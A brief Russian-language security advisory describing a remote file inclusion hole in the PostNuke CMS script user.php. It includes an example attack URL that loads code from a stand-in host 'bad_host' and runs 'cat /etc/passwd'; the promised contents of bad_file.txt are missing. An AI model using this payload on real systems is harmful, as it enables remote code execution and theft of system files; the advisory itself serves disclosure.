PostNuke — система управления содержанием, осуществленная в php, и доступная для Windows и Linux.

Возможно вынудить сценарий user.php включать произвольные модули. Эти файлы могут быть включены удаленно и содержать произвольный код, который будет выполнен уязвимой системой.

Пример: http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host &command=cat%20/etc/passwd

Где bad_file.txt:

Оставить мнение